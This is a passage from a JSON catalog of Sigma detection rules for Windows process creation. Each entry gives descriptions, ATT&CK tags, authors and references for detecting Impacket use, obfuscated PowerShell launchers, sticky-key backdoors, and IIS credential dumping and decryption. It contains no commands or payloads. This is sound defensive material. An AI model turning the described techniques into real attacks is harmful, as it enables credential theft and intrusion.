"https://www.hybrid-analysis.com/search?query=context:74940dcc5b38f9f9b1a0fea760d344735d7d91b610e6d5bd34533dd0153402c5&from_sample=5db135000388385a7644131f&block_redirect=1", - "https://twitter.com/cyberwar_15/status/1187287262054076416", - "https://blog.alyac.co.kr/1901", - "https://en.wikipedia.org/wiki/Hangul_(word_processor)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hwp_exploits.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1566.001", - "attack.execution", - "attack.t1203", - "attack.t1059.003", - "attack.g0032" - ], - "creation_date": "2019/10/24", - "filename": 
"proc_creation_win_hwp_exploits.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detect use of icacls to deny access for everyone in Users folder sometimes used to hide malicious files", - "uuid": "4ae81040-fc1c-4249-bfa3-938d260214d9", - "value": "Use Icacls to Hide File to Everyone", - "meta": { - "refs": [ - "https://app.any.run/tasks/1df999e6-1cb8-45e3-8b61-499d1b7d5a9b/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_icacls_deny.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.001" - ], - "creation_date": "2022/07/18", - "filename": "proc_creation_win_icacls_deny.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. 
An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.", - "uuid": "97dbf6e2-e436-44d8-abee-4261b24d3e41", - "value": "Microsoft IIS Connection Strings Decryption", - "meta": { - "refs": [ - "https://www.elastic.co/guide/en/security/current/microsoft-iis-connection-strings-decryption.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_connection_strings_decryption.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003" - ], - "creation_date": "2022/09/28", - "filename": "proc_creation_win_iis_connection_strings_decryption.yml", - "author": "Tim Rauch", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)", - "uuid": "e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e", - "value": "Disable Windows IIS HTTP Logging", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.002/T1562.002.md#atomic-test-1---disable-windows-iis-http-logging", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_http_logging.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.002" - ], - "creation_date": "2022/01/09", - "filename": "proc_creation_win_iis_http_logging.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords", - "uuid": "2d3cdeec-c0db-45b4-aa86-082f7eb75701", - "value": "Microsoft IIS Service Account 
Password Dumped", - "meta": { - "refs": [ - "https://www.elastic.co/guide/en/security/current/microsoft-iis-service-account-password-dumped.html", - "https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA", - "https://www.netspi.com/blog/technical/network-penetration-testing/decrypting-iis-passwords-to-break-out-of-the-dmz-part-2/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_service_account_password_dumped.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003" - ], - "creation_date": "2022/11/08", - "filename": "proc_creation_win_iis_service_account_password_dumped.yml", - "author": "Tim Rauch, Janantha Marasinghe", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity", - "uuid": "f11f2808-adb4-46c0-802a-8660db50fa99", - "value": "ImagingDevices Unusual Parent Or Child Processes", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_imaging_devices_unusual_parents.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution" - ], - "creation_date": "2022/09/27", - "filename": "proc_creation_win_imaging_devices_unusual_parents.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)", - "uuid": "4627c6ae-6899-46e2-aa0c-6ebcb1becd19", - 
"value": "Impacket Tool Execution", - "meta": { - "refs": [ - "https://github.com/ropnop/impacket_static_binaries/releases/tag/0.9.21-dev-binaries", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_impacket_compiled_tools.yml" - ], - "tags": [ - "attack.execution", - "attack.t1557.001" - ], - "creation_date": "2021/07/24", - "filename": "proc_creation_win_impacket_compiled_tools.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate use of the impacket tools" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework", - "uuid": "10c14723-61c7-4c75-92ca-9af245723ad2", - "value": "Impacket Lateralization Detection", - "meta": { - "refs": [ - "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/wmiexec.py", - "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/atexec.py", - "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/smbexec.py", - "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/dcomexec.py", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_impacket_lateralization.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.003" - ], - "creation_date": "2019/09/03", - "filename": "proc_creation_win_impacket_lateralization.yml", - "author": "Ecco, oscd.community, Jonhnathan Ribeiro", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", - 
"uuid": "5f6a601c-2ecb-498b-9c33-660362323afa", - "value": "Root Certificate Installed From Susp Locations", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", - "https://docs.microsoft.com/en-us/powershell/module/pki/import-certificate?view=windowsserver2022-ps", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_import_cert_susp_locations.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1553.004" - ], - "creation_date": "2022/09/09", - "filename": "proc_creation_win_import_cert_susp_locations.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detect indirect command execution via Program Compatibility Assistant (pcalua.exe or forfiles.exe).", - "uuid": "fa47597e-90e9-41cd-ab72-c3b74cfb0d02", - "value": "Indirect Command Execution", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1202/T1202.md", - "https://eqllib.readthedocs.io/en/latest/analytics/884a7ccd-7305-4130-82d0-d4f90bc118b6.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_indirect_cmd.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1202" - ], - "creation_date": "2019/10/24", - "filename": "proc_creation_win_indirect_cmd.yml", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", - "level": "low", - "falsepositive": [ - "Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts.", - "Legitimate usage of scripts." 
- ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of native Windows tool, forfiles to execute a file. Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.", - "uuid": "a85cf4e3-56ee-4e79-adeb-789f8fb209a8", - "value": "Indirect Command Exectuion via Forfiles", - "meta": { - "refs": [ - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-73d61931b2c77fde294189ce5d62323b416296a7c23ea98a608f425566538d1a", - "https://lolbas-project.github.io/lolbas/Binaries/Forfiles/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_indirect_command_execution_forfiles.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1202" - ], - "creation_date": "2022/10/17", - "filename": "proc_creation_win_indirect_command_execution_forfiles.yml", - "author": "Tim Rauch (rule), Elastic (idea)", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.", - "uuid": "ce7cf472-6fcc-490a-9481-3786840b5d9b", - "value": "InfDefaultInstall.exe .inf Execution", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md#atomic-test-4---infdefaultinstallexe-inf-execution", - "https://lolbas-project.github.io/lolbas/Binaries/Infdefaultinstall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_infdefaultinstall.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2021/07/13", - "filename": "proc_creation_win_infdefaultinstall.yml", - "author": "frack113", - 
"level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects encoded base64 MZ header in the commandline", - "uuid": "22e58743-4ac8-4a9f-bf19-00a0428d8c5f", - "value": "Base64 MZ Header In CommandLine", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_inline_base64_mz_header.yml" - ], - "tags": [ - "attack.execution" - ], - "creation_date": "2022/07/12", - "filename": "proc_creation_win_inline_base64_mz_header.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of WinAPI Functions via the commandline as seen used by threat actors via the tool winapiexec", - "uuid": "ba3f5c1b-6272-4119-9dbd-0bc8d21c2702", - "value": "Accessing WinAPI Via CommandLine", - "meta": { - "refs": [ - "https://twitter.com/m417z/status/1566674631788007425", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_inline_win_api_access.yml" - ], - "tags": [ - "attack.execution", - "attack.t1106" - ], - "creation_date": "2022/09/06", - "filename": "proc_creation_win_inline_win_api_access.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).", - "uuid": "ae215552-081e-44c7-805f-be16f975c8a2", - "value": "Suspicious Debugger Registration Cmdline", - "meta": { - "refs": [ - "https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/", - 
"https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_install_reg_debugger_backdoor.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.008" - ], - "creation_date": "2019/09/06", - "filename": "proc_creation_win_install_reg_debugger_backdoor.yml", - "author": "Florian Roth, oscd.community, Jonhnathan Ribeiro", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detect an interactive AT job, which may be used as a form of privilege escalation.", - "uuid": "60fc936d-2eb0-4543-8a13-911c750a1dfc", - "value": "Interactive AT Job", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md", - "https://eqllib.readthedocs.io/en/latest/analytics/d8db43cf-ed52-4f5c-9fb3-c9a4b95a0b56.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_interactive_at.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1053.002" - ], - "creation_date": "2019/10/24", - "filename": "proc_creation_win_interactive_at.yml", - "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", - "level": "high", - "falsepositive": [ - "Unlikely (at.exe deprecated as of Windows 8)" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "uuid": "b222df08-0e07-11eb-adc1-0242ac120002", - "value": "Invoke-Obfuscation CLIP+ Launcher", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_clip.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/13", - "filename": "proc_creation_win_invoke_obfuscation_clip.yml", - "author": "Jonathan Cheong, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block", - "uuid": "4bf943c6-5146-4273-98dd-e958fd1e3abf", - "value": "Invoke-Obfuscation Obfuscated IEX Invocation", - "meta": { - "refs": [ - "https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_obfuscated_iex_commandline.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2019/11/08", - "filename": "proc_creation_win_invoke_obfuscation_obfuscated_iex_commandline.yml", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": 
"process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "uuid": "6c96fc76-0eb1-11eb-adc1-0242ac120002", - "value": "Invoke-Obfuscation STDIN+ Launcher", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_stdin.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/15", - "filename": "proc_creation_win_invoke_obfuscation_stdin.yml", - "author": "Jonathan Cheong, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "uuid": "27aec9c9-dbb0-4939-8422-1742242471d0", - "value": "Invoke-Obfuscation VAR+ Launcher", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_var.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/15", - "filename": "proc_creation_win_invoke_obfuscation_var.yml", - "author": "Jonathan Cheong, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "uuid": "7eedcc9d-9fdb-4d94-9c54-474e8affc0c7", - "value": "Invoke-Obfuscation COMPRESS OBFUSCATION", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_compress.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/18", - "filename": "proc_creation_win_invoke_obfuscation_via_compress.yml", - "author": "Timur Zinniatullin, oscd.community", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", - "uuid": "056a7ee1-4853-4e67-86a0-3fd9ceed7555", - "value": "Invoke-Obfuscation RUNDLL LAUNCHER", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_rundll.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/18", - "filename": "proc_creation_win_invoke_obfuscation_via_rundll.yml", - "author": "Timur Zinniatullin, oscd.community", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "uuid": "9c14c9fa-1a63-4a64-8e57-d19280559490", - "value": "Invoke-Obfuscation Via Stdin", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_stdin.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/12", - "filename": "proc_creation_win_invoke_obfuscation_via_stdin.yml", - "author": "Nikita Nazarov, oscd.community", - "level": "high", - "falsepositive": [ 
- "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "uuid": "e1561947-b4e3-4a74-9bdd-83baed21bdb5", - "value": "Invoke-Obfuscation Via Use Clip", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_use_clip.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/09", - "filename": "proc_creation_win_invoke_obfuscation_via_use_clip.yml", - "author": "Nikita Nazarov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "uuid": "ac20ae82-8758-4f38-958e-b44a3140ca88", - "value": "Invoke-Obfuscation Via Use MSHTA", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_use_mhsta.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/08", - "filename": "proc_creation_win_invoke_obfuscation_via_use_mhsta.yml", - "author": "Nikita Nazarov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "uuid": "36c5146c-d127-4f85-8e21-01bf62355d5a", - "value": "Invoke-Obfuscation Via Use Rundll32", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_use_rundll32.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2019/10/08", - "filename": "proc_creation_win_invoke_obfuscation_via_use_rundll32.yml", - "author": "Nikita Nazarov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "uuid": "e9f55347-2928-4c06-88e5-1a7f8169942e", - "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_var.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/10/13", - "filename": "proc_creation_win_invoke_obfuscation_via_var.yml", - "author": "Timur Zinniatullin, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of IOX - a tool for port forwarding and intranet proxy purposes", - "uuid": "d7654f02-e04b-4934-9838-65c46f187ebc", - "value": "IOX Tunneling Tool", - "meta": { - "refs": [ - "https://github.com/EddieIvan01/iox", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iox.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1090" - ], - "creation_date": "2022/10/08", - "filename": "proc_creation_win_iox.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "process_creation", - "logsource.product": 
"windows" - } - }, - { - "description": "Detect the use of Jlaive to execute assemblies in a copied PowerShell", - "uuid": "0a99eb3e-1617-41bd-b095-13dc767f3def", - "value": "Jlaive Usage For Assembly Execution In-Memory", - "meta": { - "refs": [ - "https://jstnk9.github.io/jstnk9/research/Jlaive-Antivirus-Evasion-Tool", - "https://github.com/ch2sh/Jlaive", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_jlaive_batch_execution.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.003" - ], - "creation_date": "2022/05/24", - "filename": "proc_creation_win_jlaive_batch_execution.yml", - "author": "Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of Ldifde.exe with specific command line arguments to potentially load an LDIF file containing HTTP-based arguments.\nLdifde.exe is present, by default, on domain controllers and only requires user-level authentication to execute.\n", - "uuid": "6f535e01-ca1f-40be-ab8d-45b19c0c8b7f", - "value": "Suspicious Ldifde Command Usage", - "meta": { - "refs": [ - "https://twitter.com/0gtweet/status/1564968845726580736", - "https://strontic.github.io/xcyclopedia/library/ldifde.exe-979DE101F5059CEC1D2C56967CA2BAC0.html", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ldifde_file_load.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105", - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2022/09/02", - "filename": "proc_creation_win_ldifde_file_load.yml", - "author": "@gott_cyber", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - 
"logsource.product": "windows" - } - }, - { - "description": "Detects MSHTA.EXE spwaned by SVCHOST as seen in LethalHTA and described in report", - "uuid": "ed5d72a6-f8f4-479d-ba79-02f6a80d7471", - "value": "MSHTA Spwaned by SVCHOST", - "meta": { - "refs": [ - "https://codewhitesec.blogspot.com/2018/07/lethalhta.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lethalhta.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.005" - ], - "creation_date": "2018/06/07", - "filename": "proc_creation_win_lethalhta.yml", - "author": "Markus Neis", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Local accounts, System Owner/User discovery using operating systems utilities", - "uuid": "502b42de-4306-40b4-9596-6f590c81f073", - "value": "Local Accounts Discovery", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_local_system_owner_account_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1033", - "attack.t1087.001" - ], - "creation_date": "2019/10/21", - "filename": "proc_creation_win_local_system_owner_account_discovery.yml", - "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate administrator or user enumerates local users for legitimate reason" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as 
legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "uuid": "d85873ef-a0f8-4c48-a53a-6b621f11729d", - "value": "Use of LogMeIn Remote Access Software", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_logmein.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], - "creation_date": "2022/02/11", - "filename": "proc_creation_win_logmein.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects creation or execution of UserInitMprLogonScript persistence method", - "uuid": "0a98a10c-685d-4ab0-bddc-b6bdd1d48458", - "value": "Logon Scripts (UserInitMprLogonScript)", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1037/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml" - ], - "tags": [ - "attack.t1037.001", - "attack.persistence" - ], - "creation_date": "2019/01/12", - "filename": "proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml", - "author": "Tom Ueltschi (@c_APT_ure), Tim Shelton", - "level": "high", - "falsepositive": [ - "Exclude legitimate logon scripts" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "This rule will monitor any office apps that spins up a new LOLBin process. 
This activity is pretty suspicious and should be investigated.", - "uuid": "23daeb52-e6eb-493c-8607-c4f0246cb7d8", - "value": "New Lolbin Process by Office Applications", - "meta": { - "refs": [ - "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", - "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e", - "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", - "https://github.com/splunk/security_content/blob/develop/detections/endpoint/office_spawning_control.yml", - "https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A", - "https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbins_by_office_applications.yml" - ], - "tags": [ - "attack.t1204.002", - "attack.t1047", - "attack.t1218.010", - "attack.execution", - "attack.defense_evasion" - ], - "creation_date": "2021/08/23", - "filename": "proc_creation_win_lolbins_by_office_applications.yml", - "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Michael Haag, Christopher Peacock @securepeacock (Update), SCYTHE @scythe_io (Update)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "This rule will monitor LOLBin process creations by wmiprvse. 
